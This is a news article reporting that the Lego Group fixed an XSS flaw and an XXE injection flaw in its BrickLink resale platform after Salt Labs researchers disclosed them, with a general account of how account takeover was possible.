The Lego Group has moved swiftly to fix a pair of application programming interface (API) security vulnerabilities that existed in its BrickLink digital resale platform, after they were identified by Salt Labs, the research arm of API specialist Salt Security.
With over a million members, BrickLink is the world’s largest forum for buying and selling second-hand Lego sets. Substantial sums of money change hands through the eBay style service, with desirable kits, such as the Hogwarts Express from Lego’s Harry Potter series often selling for close to their original retail price. The holiday period is a particularly busy time for the service, particularly when the time comes to pass on duplicate presents.
The two vulnerabilities were uncovered by Salt’s researchers when they examined parts of the BrickLink site that support user input fields. Specifically, the “Find Username” dialogue box of BrickLink’s coupon search vulnerability contained a cross-site scripting (XSS) vulnerability – used by malicious actors to inject and execute code on a victim’s machine if they follow a specially crafted link.
The research team chained this vulnerability Session ID exposed on a different page to hijack the victim’s session and take over their account. Such tactics could have been used for full account takeover, and to steal user data.
The second vulnerability existed in BrickLink’s “Upload to Wanted List” page – which lets users add Lego sets they have their eye on to a watchlist. Salt’s team were able to execute what is known as an Extensible Markup Language (XML) External Entity (XXE) injection attack, in which an XML input that contains a reference to an external entity is processed by a poorly configured XML parser.